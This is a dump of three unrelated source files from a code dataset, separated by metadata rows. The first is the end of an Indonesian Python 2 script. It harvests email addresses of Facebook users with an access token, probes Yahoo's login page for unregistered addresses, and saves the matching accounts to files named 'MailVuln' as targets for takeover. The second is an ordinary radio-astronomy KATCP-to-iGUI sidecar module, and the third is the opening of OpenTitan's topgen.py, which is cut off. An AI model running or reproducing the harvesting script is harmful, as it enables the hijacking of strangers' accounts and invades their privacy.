links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;97mVULNโ\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;96m[\033[1;92mVULNโ\033[1;96m] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"[email protected]"
] | |
eb0b852d2a658bb922774b066101a08867293196 | 48098932f49ae05c4528f5d79385e2d8bb1731ec | /mpikat/sidecars/igui_sidecar.py | e7f0d7b57e1a5119625f95baf849a63eb3f1c8c4 | [
"MIT"
] | permissive | ewanbarr/mpikat | 80fcb29dcc4d00b52a5c49609d9ca35cf0964da5 | 1c9a7376f9e79dfeec5a151d8f483d6fdf3e7cc9 | refs/heads/master | 2022-09-25T14:51:30.885196 | 2020-10-20T14:05:50 | 2020-10-20T14:05:50 | 237,917,037 | 0 | 0 | MIT | 2020-03-13T14:35:50 | 2020-02-03T08:22:04 | null | UTF-8 | Python | false | false | 30,256 | py |
import signal
import logging
import tornado
import requests
import types
import pprint
import json
from abc import ABCMeta, abstractmethod
from optparse import OptionParser
from katcp import KATCPClientResource
log = logging.getLogger("mpikat.katcp_to_igui_sidecar")
class IGUILoginException(Exception):
pass
class IGUIMappingException(Exception):
pass
class IGUIObject(object):
__metaclass__ = ABCMeta
def __init__(self, id_, name, detail, parent, child_map):
"""
@brief Abstract base class for IGUI objects
@param id_ The iGUI ID for the object
@param name The iGUI name for the object
@param detail A dictionary containing the iGUI description for the object
@param parent The parent object for this object
@param child_map An IGUIMap subclass instance containing a mapping to any child objects
"""
self.id = id_
self.name = name
self.detail = detail
self.parent = parent
self.children = child_map
def __repr__(self):
return "<class {}: {}>".format(self.__class__.__name__, self.name)
class IGUIRx(IGUIObject):
def __init__(self, detail):
"""
@brief Class for igui receivers.
@param detail A dictionary containing the iGUI description for the object
@note The 'detail' dictionary must contain at minimum 'rx_id' and 'rx_name' keys
"""
super(IGUIRx, self).__init__(detail["rx_id"], detail["rx_name"],
detail, None, IGUIDeviceMap(self))
self.devices = self.children
class IGUIDevice(IGUIObject):
def __init__(self, detail, parent):
"""
@brief Class for igui devices.
@param detail A dictionary containing the iGUI description for the object
@param parent The parent object for this object
@note The 'detail' dictionary must contain at minimum 'device_id' and 'name' keys
"""
super(IGUIDevice, self).__init__(detail["device_id"], detail["name"],
detail, parent, IGUITaskMap(self))
self.tasks = self.children
class IGUITask(IGUIObject):
def __init__(self, detail, parent):
"""
@brief Class for igui tasks.
@param detail A dictionary containing the iGUI description for the object
@param parent The parent object for this object
@note The 'detail' dictionary must contain at minimum 'task_id' and 'task_name' keys
"""
super(IGUITask, self).__init__(detail["task_id"], detail["task_name"],
detail, parent, None)
class IGUIMap(object):
__metaclass__ = ABCMeta
def __init__(self):
"""
@brief Abstract base class for maps of iGUI objects.
"""
self._id_to_name = {}
self._name_to_id = {}
self._by_id = {}
def by_name(self, name):
"""
@brief Look up an iGUI object by name
@param name The name of the object
@return An iGUI object
"""
return self._by_id[self._name_to_id[name]]
def by_id(self, id_):
"""
@brief Look up an iGUI object by id
@param id_ The ID of the iGUI object
@return An iGUI object
"""
return self._by_id[id_]
@abstractmethod
def add(self, id_, name, child):
"""
@brief Add an iGUI object to this map
@param id_ The ID of the object
@param name The name of the object
@param child The child iGUI object
"""
self._id_to_name[id_] = name
self._name_to_id[name] = id_
self._by_id[id_] = child
def __iter__(self):
return self._by_id.values().__iter__()
def _custom_repr(self):
out = {}
for id_, child in self._by_id.items():
if child.children:
out[repr(child)] = child.children._custom_repr()
else:
out[repr(child)] = ''
return out
def __repr__(self):
return pprint.pformat(self._custom_repr(), indent=2)
class IGUIRxMap(IGUIMap):
def __init__(self):
"""
@brief Class for igui receiver map.
"""
super(IGUIRxMap, self).__init__()
def add(self, rx):
"""
@brief Add an iGUI receiver to the map
@param rx An iGUI receiver dictionary
"""
super(IGUIRxMap, self).add(rx["rx_id"], rx["rx_name"], IGUIRx(rx))
class IGUIDeviceMap(IGUIMap):
def __init__(self, parent_rx):
"""
@brief Class for igui device map.
@param parent_rx The IGUIRx instance that is this device's parent
"""
super(IGUIDeviceMap, self).__init__()
self._parent_rx = parent_rx
def add(self, device):
"""
@brief Add an iGUI device to the map
@param device An iGUI device dictionary
"""
super(IGUIDeviceMap, self).add(device["device_id"], device["name"],
IGUIDevice(device, self._parent_rx))
class IGUITaskMap(IGUIMap):
def __init__(self, parent_device):
"""
@brief Class for igui task map.
@param parent_device The IGUIDevice instance that is this task's parent
"""
super(IGUITaskMap, self).__init__()
self._parent_device = parent_device
def add(self, task):
"""
@brief Add an iGUI task to the map
@param task An iGUI task dictionary
"""
super(IGUITaskMap, self).add(task["task_id"], task["task_name"],
IGUITask(task, self._parent_device))
def _custom_repr(self):
return [repr(task) for task in self._by_id.values()]
class IGUIConnection(object):
def __init__(self, host, user, password):
"""
@brief Class for igui connection.
@detail This class wraps a connection to an iGUI instance, providing methods
to query the server and update task values. Some functions require a
valid login. To use these functions the 'login' method of the class
must be called with valid credentials
@param host The hostname or IP address for the iGUI server (can include a port number)
@param user The username for the iGUI connection
@param password The password for the iGUI connection
"""
self._session = requests.Session()
self._logged_in = False
self._rx_by_name = {}
self._rx_by_id = {}
self._devices = {}
self._tasks = {}
self.igui_group_id = None
self._host = host
self._user = user
self._password = password
self._url = "http://{}/getData.php".format(self._host)
self._headers = {
'Host': '{}'.format(self._host),
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'DNT': '1',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'http://{}/icom/home'.format(self._host),
'Connection': 'keep-alive'}
def login(self):
"""
@brief Login to the iGUI server
@detail Uses the credentials supplied to the constructor. If the login
is unsuccessful an IGUILoginException will be raised.
"""
response = self._session.post(self._url, headers=self._headers,
data=self._make_data("checkUser", [self._user, self._password]))
if response.text != "true":
log.debug(response.text)
raise IGUILoginException(
"Could not log into iGUI host {}".format(self._host))
userdata = json.loads(self._session.post(self._url, headers=self._headers,
data=self._make_data("loadUsers")).text)
fedata = json.loads(self._session.post(self._url, headers=self._headers,
data=self._make_data("loadFEData")).text)
for i in range(len(fedata)):
for j in range(len(userdata)):
if (fedata[i]['guid'] == userdata[j]['guid']) & (fedata[i]['username'] == self._user):
if userdata[j]['group_id'] == '95b109308df411e58cde0800277d0263':
log.info('User is an engineer')
self.igui_group_id = userdata[j]['group_id']
else:
raise IGUILoginException(
"You are not an engineer, you can't use the sidecar.")
self._logged_in = True
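# Illustrative usage (editor's sketch, not part of the original module; the
# host name and credentials below are placeholders):
#
#   conn = IGUIConnection("igui.example.org:8080", "engineer", "secret")
#   conn.login()  # raises IGUILoginException on failure
#   rx_map = conn.build_igui_representation()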
def build_igui_representation(self):
"""
@brief Builds a representation of the igui data model.
@detail The returned map is only valid at the moment it is returned. Methods
on this class act directly on the map to register new receivers, devices
and tasks, but remote changes to iGUI will not be reflected and the
representation must be rebuilt to synchronize with any server-side changes.
@return An IGUIRxMap object
"""
log.debug("building IGUI rep")
rx_map = IGUIRxMap()
for rx in self.load_all_rx_data():
# for rx in self.load_all_rx():
log.debug(rx)
rx_map.add(rx)
for device in self.load_all_devices():
try:
# log.debug(rx_map.by_id(device["rx_id"]).devices.add(device))
rx_map.by_id(device["rx_id"]).devices.add(device)
except TypeError:
pass
for task in self.load_all_tasks():
try:
# log.debug(rx_map.by_id(task["rx_id"]).devices.by_id(task["device_id"]).tasks.add(task))
rx_map.by_id(task["rx_id"]).devices.by_id(
task["device_id"]).tasks.add(task)
except TypeError:
pass
return rx_map
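# Example traversal of the returned map (editor's sketch; the receiver,
# device and task names are hypothetical):
#
#   rx_map = conn.build_igui_representation()
#   task = rx_map.by_name("MyRx").devices.by_name("MyDevice").tasks.by_name("TEMP")
#   conn.set_task_value(task, "42")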
def _safe_post(self, *args, **kwargs):
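# Editor's note: retry the request once after re-authenticating when the
# server reports an expired session; raise IGUILoginException if the
# retry also fails.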
FAIL_RESPONSE = u'"Not a valid session!"'
# log.debug("POST request: {}, {}".format(args, kwargs))
response = self._session.post(*args, **kwargs)
# log.debug("POST response: {}".format(response.text))
if response.text == FAIL_RESPONSE:
self.login()
response = self._session.post(*args, **kwargs)
if response.text == FAIL_RESPONSE:
raise IGUILoginException("Unable to login to IGUI")
return response
def _update_task(self, task, value):
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updateTask", task.id, value))
return response.text
def set_rx_status(self, reciever, values):
"""
@brief Set the status of a receiver
@param reciever An IGUIRx object to be updated
@param values A list of the new values for the receiver status:
active (Y/N), test_mode (Y/N), port and username
@return 'true' or 'false' as returned by the server
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setRxStatus", reciever.id, values))
return response.text
def set_device_status(self, device, value):
"""
@brief Set the status of a device
@param device An IGUIDevice object to be updated
@param value The new value for the device status (Y/N)
@return 'true' or 'false' as returned by the server
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setDeviceStatus", device.id, value))
return response.text
def update_group_rx_privileges(self, group_id, value):
"""
@brief Set the "show_rx" flag of a receiver for a group in the iGUI DB
@param group_id A list of [group_id, rx_id] (optionally followed by "update") passed as fn_in
@param value "Y" or "N" for the flag
@note This returns the text response from the server
@note update_group_rx_privileges([group_id,rx_id],"Y")
@note update_group_rx_privileges([group_id,rx_id,"update"],"Y")
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updGrpRXPrivileges", group_id, value))
return response.text
def update_group_task_privileges(self, group_id, value):
"""
@brief Set the flag for "update task" of a task
@param group_id A list of [group_id, task_id] (optionally followed by "update") passed as fn_in
@param value "Y" or "N" for the flag
@note This returns the text response from the server
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updGrpTasksPrivileges", group_id, value))
return response.text
def set_task_value(self, task, value):
"""
@brief Set the value of a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note Currently this returns the text response from the server
but as the server-side method is not currently setup exactly
as is required this is not meaningful. When the server-side
implementation is updated, this will be replaced with a success
or fail check.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setTaskValue", task.id, value))
return response.text
def set_task_blob(self, task, value):
"""
@brief Update the blob in a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note Currently this returns the text response from the server
but as the server-side method is not currently set up exactly
as is required this is not meaningful. When the server-side
implementation is updated, this will be replaced with a success
or fail check.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("setTaskBlob", task.id, value))
return response.text
def update_task(self, task, value):
"""
@brief Update the value of a task
@param task An IGUITask object to be updated
@param value The new value for the task
@note Currently this returns the text response from the server
but as the server-side method is not currently set up exactly
as is required this is not meaningful. When the server-side
implementation is updated, this will be replaced with a success
or fail check.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("updateTask", task.id, value))
return response.text
def load_all_devices(self):
"""
@brief Gets all iGUI devices.
@return An IGUIDeviceMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadAllDevices"))
devices = response.json()
if devices == "N":
log.warning("No devices returned")
devices = []
return devices
def load_all_rx(self):
"""
@brief Gets all iGUI recievers.
@return An IGUIRxMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadRx"))
rx = response.json()
if rx == "N":
log.warning("No receivers returned")
rx = []
return rx
def load_all_rx_data(self):
"""
@brief Gets all iGUI recievers data.
@return An IGUIRxMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadRXData"))
rx = response.json()
if rx == "N":
log.warning("No receiver data returned (does the user have engineer privileges?)")
rx = []
return rx
def load_all_tasks(self):
"""
@brief Gets all iGUI tasks.
@return An IGUITaskMap object.
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("loadAllTasks"))
tasks = response.json()
return tasks
def create_rx(self, icom_id, params):
"""
@brief Create a receiver
@param icom_id The icom ID for the new receiver
@param params The parameters for the new receiver
@return A string containing a JSON object describing the newly created receiver
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("createRx", icom_id, params))
return response.text
def delete_rx(self, rx_id):
"""
@brief Delete a receiver
@param rx_id The ID of the receiver to delete
@return 'true' or 'false' as returned by the server
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("deleteRx", rx_id))
return response.text
def create_device(self, reciever, params):
"""
@brief Create a device
@param reciever The IGUIRx object to which the device is added as a child
@param params Name of the new device, version number and active status
@return A string containing a JSON object describing the newly created device
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("createDevice", reciever.id, params))
return response.text
def create_task(self, device, params):
"""
@brief Create a task
@param device The IGUIDevice object to which the task is added as a child
@param params List of parameters for the new task (task_name, task_type (fe_task_type),
task_unit, mysql_task_type, option_available, current_value, current_value_blob,
init_val, lower_limit, upper_limit, update_interval)
@return A string containing a JSON object describing the newly created task
@note params example :["TEMP","NONE","C","GETSET","0", "12","blob","0","0","1000","300"]
"""
response = self._safe_post(self._url, headers=self._headers,
data=self._make_data("createTask", device.id, params))
return response.text
def _make_data(self, fn, fn_in='0', fn_in_param='0'):
data = []
def _helper(name, param):
if hasattr(param, "__iter__") and not isinstance(param, types.StringTypes):
for subparam in param:
data.append(("{}[]".format(name), subparam))
else:
data.append((name, param))
_helper("data[fn]", fn)
_helper("data[fn_in]", fn_in)
_helper("data[fn_in_param]", fn_in_param)
return data
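# For reference (editor's note): _make_data builds the flat key/value list that
# requests encodes as application/x-www-form-urlencoded. For example,
# _make_data("setTaskValue", "<task_id>", "42") yields
#   [("data[fn]", "setTaskValue"), ("data[fn_in]", "<task_id>"),
#    ("data[fn_in_param]", "42")]
# and list-valued arguments are expanded into repeated "name[]" entries.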
class KATCPToIGUIConverter(object):
def __init__(self, host, port, igui_host, igui_user, igui_pass, igui_device_id):
"""
@brief Class for katcp to igui converter.
@param host KATCP host address
@param port KATCP port number
@param igui_host iGUI server hostname
@param igui_user iGUI username
@param igui_pass iGUI password
@param igui_device_id iGUI device ID
"""
self.rc = KATCPClientResource(dict(
name="test-client",
address=(host, port),
controlled=True))
self.host = host
self.port = port
self.igui_host = igui_host
self.igui_user = igui_user
self.igui_pass = igui_pass
self.igui_group_id = None
self.igui_device_id = igui_device_id
self.igui_connection = IGUIConnection(
self.igui_host, self.igui_user, self.igui_pass)
self.igui_task_id = None
self.igui_rxmap = None
self.ioloop = None
self.ic = None
self.api_version = None
self.implementation_version = None
self.previous_sensors = set()
def start(self):
"""
@brief Start the instance running
@detail This call will trigger connection of the KATCPResource client and
will login to the iGUI server. Once both connections are established
the instance will retrieve a mapping of the iGUI receivers, devices
and tasks and will try to identify the parent of the device_id
provided in the constructor.
"""
@tornado.gen.coroutine
def _start():
log.debug("Waiting on synchronisation with server")
yield self.rc.until_synced()
log.debug("Client synced")
log.debug("Requesting version info")
# This information can be used to get an iGUI device ID
response = yield self.rc.req.version_list()
log.info("response {}".format(response))
# for an internal device KATCP server, response.informs[2].arguments raises an index-out-of-range error
#_, api, implementation = response.informs[2].arguments
#self.api_version = api
#self.implementation_version = implementation
#log.info("katcp-device API: {}".format(self.api_version))
#log.info("katcp-device implementation: {}".format(self.implementation_version))
self.ioloop.add_callback(self.update)
log.debug("Starting {} instance".format(self.__class__.__name__))
# self.igui_connection.login()
#self.igui_connection.login(self.igui_user, self.igui_pass)
self.igui_rxmap = self.igui_connection.build_igui_representation()
#log.debug(self.igui_rxmap)
# Here we do a look up to find the parent of this device
for rx in self.igui_rxmap:
log.debug(rx.id)
if self.igui_device_id in rx.devices._by_id.keys():
log.debug(self.igui_device_id)
log.debug(rx.id)
self.igui_rx_id = rx.id
log.debug("Found Rx parent: {}".format(self.igui_rx_id))
break
else:
log.debug("Device '{}' is not a child of any receiver".format(
self.igui_device_id))
raise IGUIMappingException(
"Device '{}' is not a child of any receiver".format(self.igui_device_id))
#log.debug("iGUI representation:\n{}".format(self.igui_rxmap))
self.rc.start()
self.ic = self.rc._inspecting_client
self.ioloop = self.rc.ioloop
self.ic.katcp_client.hook_inform("interface-changed",
lambda message: self.ioloop.add_callback(self.update))
self.ioloop.add_callback(_start)
@tornado.gen.coroutine
def update(self):
"""
@brief Synchronise with the KATCP server's sensors and register new listeners
"""
log.debug("Waiting on synchronisation with server")
yield self.rc.until_synced()
log.debug("Client synced")
current_sensors = set(self.rc.sensor.keys())
log.debug("Current sensor set: {}".format(current_sensors))
removed = self.previous_sensors.difference(current_sensors)
log.debug("Sensors removed since last update: {}".format(removed))
added = current_sensors.difference(self.previous_sensors)
log.debug("Sensors added since last update: {}".format(added))
for name in list(added):
log.debug(
"Setting sampling strategy and callbacks on sensor '{}'".format(name))
# strat3 = ('event-rate', 2.0, 3.0) #event-rate doesn't work
# self.rc.set_sampling_strategy(name, strat3) #KATCPSensorError:
# Error setting strategy
# not sure what 'auto' means here
self.rc.set_sampling_strategy(name, "auto")
#self.rc.set_sampling_strategy(name, ["period", (10)])
#self.rc.set_sampling_strategy(name, "event")
self.rc.set_sensor_listener(name, self._sensor_updated)
self.previous_sensors = current_sensors
def _sensor_updated(self, sensor, reading):
"""
@brief Callback to be executed on a sensor being updated
@param sensor The sensor
@param reading The sensor reading
"""
log.debug("Received sensor update for sensor '{}': {}".format(
sensor.name, repr(reading)))
try:
rx = self.igui_rxmap.by_id(self.igui_rx_id)
except KeyError:
raise Exception(
"No iGUI receiver with ID {}".format(self.igui_rx_id))
try:
device = rx.devices.by_id(self.igui_device_id)
except KeyError:
raise Exception(
"No iGUI device with ID {}".format(self.igui_device_id))
try:
#self.igui_rxmap = self.igui_connection.build_igui_representation()
#device = self.igui_rxmap.by_id(self.igui_rx_id).devices.by_id(self.igui_device_id)
task = device.tasks.by_name(sensor.name)
except KeyError:
if (sensor.name[-3:] == 'PNG'):
task = json.loads(self.igui_connection.create_task(
device, (sensor.name, "NONE", "", "IMAGE", "GET_SET", "0", "0", "0", "-10000000000000000", "10000000000000000", "300")))
else:
task = json.loads(self.igui_connection.create_task(
device, (sensor.name, "NONE", "", "GETSET", "GET", "0", "0", "0", "-10000000000000000", "10000000000000000", "300")))
self.igui_task_id = str(task[0]['rx_task_id'])
self.igui_connection.update_group_task_privileges(
[self.igui_connection.igui_group_id, self.igui_task_id], "Y")
self.igui_connection.update_group_task_privileges(
[self.igui_connection.igui_group_id, self.igui_task_id, "update"], "Y")
self.igui_rxmap = self.igui_connection.build_igui_representation()
device = self.igui_rxmap.by_id(
self.igui_rx_id).devices.by_id(self.igui_device_id)
task = device.tasks.by_id(self.igui_task_id)
if (sensor.name[-3:] == 'PNG'): # or some image type that we finally agreed on
log.debug(sensor.name)
log.debug(sensor.value)
log.debug(len(sensor.value))
self.igui_connection.set_task_blob(task, reading.value)
else:
self.igui_connection.set_task_value(task, sensor.value)
def stop(self):
"""
@brief Stop the client
"""
self.rc.stop()
@tornado.gen.coroutine
def on_shutdown(ioloop, client):
log.info("Shutting down client")
yield client.stop()
ioloop.stop()
def main():
usage = "usage: %prog [options]"
parser = OptionParser(usage=usage)
parser.add_option('-H', '--host', dest='host', type=str,
help='The hostname for the KATCP server to connect to')
parser.add_option('-p', '--port', dest='port', type=int,
help='The port number for the KATCP server to connect to')
parser.add_option('', '--igui_host', dest='igui_host', type=str,
help='The hostname of the iGUI interface', default="127.0.0.1")
parser.add_option('', '--igui_user', dest='igui_user', type=str,
help='The username for the iGUI connection')
parser.add_option('', '--igui_pass', dest='igui_pass', type=str,
help='The password for the IGUI connection')
parser.add_option('', '--igui_device_id', dest='igui_device_id', type=str,
help='The iGUI device ID for the managed device')
parser.add_option('', '--log_level', dest='log_level', type=str,
help='Logging level', default="INFO")
(opts, args) = parser.parse_args()
FORMAT = "[ %(levelname)s - %(asctime)s - %(filename)s:%(lineno)s] %(message)s"
logger = logging.getLogger('mpikat')
logging.basicConfig(format=FORMAT)
logger.setLevel(opts.log_level.upper())
logging.getLogger('katcp').setLevel('INFO')
ioloop = tornado.ioloop.IOLoop.current()
log.info("Starting KATCPToIGUIConverter instance")
client = KATCPToIGUIConverter(opts.host, opts.port,
opts.igui_host, opts.igui_user,
opts.igui_pass, opts.igui_device_id)
signal.signal(
signal.SIGINT,
lambda sig, frame: ioloop.add_callback_from_signal(
on_shutdown, ioloop, client))
def start_and_display():
client.start()
log.info("Ctrl-C to terminate client")
ioloop.add_callback(start_and_display)
ioloop.start()
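# A typical invocation might look like this (editor's sketch; the host names,
# port and device ID are placeholders):
#
#   python igui_sidecar.py -H katcp-server.local -p 5000 \
#       --igui_host 10.0.0.5 --igui_user engineer --igui_pass secret \
#       --igui_device_id 0123456789abcdef --log_level DEBUG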
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
e1051bcce1faa00602bf7d2638fa6b85801899e9 | fc08261383797c4581cc6df05bfcfa0b57e52701 | /util/opentitan/topgen.py | 6870c743e59719fca3d377582ae1609ad370ddb0 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | waleeds1/azadi-new | a4c68508206003215f860c0dbc9f4c7b0ef5cac0 | c2e42438bf3ebe9cf747e3b1902eb555afcade3a | refs/heads/main | 2023-08-15T21:21:50.756003 | 2021-10-14T07:03:08 | 2021-10-14T07:03:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,449 | py |
#!/usr/bin/env python3
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
r"""Top Module Generator
"""
import argparse
import logging as log
import random
import subprocess
import sys
from collections import OrderedDict
from copy import deepcopy
from io import StringIO
from pathlib import Path
from typing import Dict, Optional, Tuple
import hjson
from mako import exceptions
from mako.template import Template
import tlgen
from reggen import access, gen_rtl, window
from reggen.inter_signal import InterSignal
from reggen.ip_block import IpBlock
from reggen.lib import check_list
from topgen import amend_clocks, get_hjsonobj_xbars
from topgen import intermodule as im
from topgen import lib as lib
from topgen import merge_top, search_ips, validate_top
from topgen.c import TopGenC
from topgen.gen_dv import gen_dv
from topgen.top import Top
# Common header for generated files
warnhdr = '''//
// ------------------- W A R N I N G: A U T O - G E N E R A T E D C O D E !! -------------------//
// PLEASE DO NOT HAND-EDIT THIS FILE. IT HAS BEEN AUTO-GENERATED WITH THE FOLLOWING COMMAND:
'''
genhdr = '''// Copyright lowRISC contributors.
// Licensed under the Apache License, Version 2.0, see LICENSE for details.
// SPDX-License-Identifier: Apache-2.0
''' + warnhdr
SRCTREE_TOP = Path(__file__).parent.parent.resolve()
TOPGEN_TEMPLATE_PATH = Path(__file__).parent / 'topgen/templates'
def generate_top(top, name_to_block, tpl_filename, **kwargs):
top_tpl = Template(filename=tpl_filename)
try:
return top_tpl.render(top=top, name_to_block=name_to_block, **kwargs)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
return ""
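# Illustrative call (editor's sketch; the template file name and gencmd text
# are hypothetical):
#
#   out = generate_top(topcfg, name_to_block,
#                      str(TOPGEN_TEMPLATE_PATH / "toplevel.sv.tpl"),
#                      gencmd="// generated by topgen.py")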
def generate_xbars(top, out_path):
topname = top["name"]
gencmd = ("// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson "
"-o hw/top_{topname}/\n\n".format(topname=topname))
for obj in top["xbar"]:
xbar_path = out_path / 'ip/xbar_{}/data/autogen'.format(obj["name"])
xbar_path.mkdir(parents=True, exist_ok=True)
xbar = tlgen.validate(obj)
xbar.ip_path = 'hw/top_' + top["name"] + '/ip/{dut}'
# Generate output of crossbar with complete fields
xbar_hjson_path = xbar_path / "xbar_{}.gen.hjson".format(xbar.name)
xbar_hjson_path.write_text(genhdr + gencmd +
hjson.dumps(obj, for_json=True))
if not tlgen.elaborate(xbar):
log.error("Elaboration failed." + repr(xbar))
try:
results = tlgen.generate(xbar, "top_" + top["name"])
except: # noqa: E722
log.error(exceptions.text_error_template().render())
ip_path = out_path / 'ip/xbar_{}'.format(obj["name"])
for filename, filecontent in results:
filepath = ip_path / filename
filepath.parent.mkdir(parents=True, exist_ok=True)
with filepath.open(mode='w', encoding='UTF-8') as fout:
fout.write(filecontent)
dv_path = out_path / 'ip/xbar_{}/dv/autogen'.format(obj["name"])
dv_path.mkdir(parents=True, exist_ok=True)
# generate testbench for xbar
tlgen.generate_tb(xbar, dv_path, "top_" + top["name"])
# Read back the comportable IP and amend to Xbar
xbar_ipfile = ip_path / ("data/autogen/xbar_%s.hjson" % obj["name"])
with xbar_ipfile.open() as fxbar:
xbar_ipobj = hjson.load(fxbar,
use_decimal=True,
object_pairs_hook=OrderedDict)
r_inter_signal_list = check_list(xbar_ipobj.get('inter_signal_list', []),
'inter_signal_list field')
obj['inter_signal_list'] = [
InterSignal.from_raw('entry {} of the inter_signal_list field'
.format(idx + 1),
entry)
for idx, entry in enumerate(r_inter_signal_list)
]
def generate_alert_handler(top, out_path):
# default values
esc_cnt_dw = 32
accu_cnt_dw = 16
async_on = "'0"
# leave this constant
n_classes = 4
topname = top["name"]
# check if there are any params to be passed through reggen and placed into
# the generated package
ip_list_in_top = [x["name"].lower() for x in top["module"]]
ah_idx = ip_list_in_top.index("alert_handler")
if 'localparam' in top['module'][ah_idx]:
if 'EscCntDw' in top['module'][ah_idx]['localparam']:
esc_cnt_dw = int(top['module'][ah_idx]['localparam']['EscCntDw'])
if 'AccuCntDw' in top['module'][ah_idx]['localparam']:
accu_cnt_dw = int(top['module'][ah_idx]['localparam']['AccuCntDw'])
if esc_cnt_dw < 1:
log.error("EscCntDw must be larger than 0")
if accu_cnt_dw < 1:
log.error("AccuCntDw must be larger than 0")
# Count number of alerts
n_alerts = sum([x["width"] if "width" in x else 1 for x in top["alert"]])
if n_alerts < 1:
# set number of alerts to 1 such that the config is still valid
# that input will be tied off
n_alerts = 1
log.warning("no alerts are defined in the system")
else:
async_on = ""
for alert in top['alert']:
for k in range(alert['width']):
async_on = str(alert['async']) + async_on
async_on = ("%d'b" % n_alerts) + async_on
log.info("alert handler parameterization:")
log.info("NAlerts = %d" % n_alerts)
log.info("EscCntDw = %d" % esc_cnt_dw)
log.info("AccuCntDw = %d" % accu_cnt_dw)
log.info("AsyncOn = %s" % async_on)
# Define target path
rtl_path = out_path / 'ip/alert_handler/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/alert_handler/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
    # The IP top module generation flow is not generalized as a script yet,
    # so topgen reads template files from the alert_handler directory directly.
tpl_path = Path(__file__).resolve().parent / '../hw/ip/alert_handler/data'
hjson_tpl_path = tpl_path / 'alert_handler.hjson.tpl'
# Generate Register Package and RTLs
out = StringIO()
with hjson_tpl_path.open(mode='r', encoding='UTF-8') as fin:
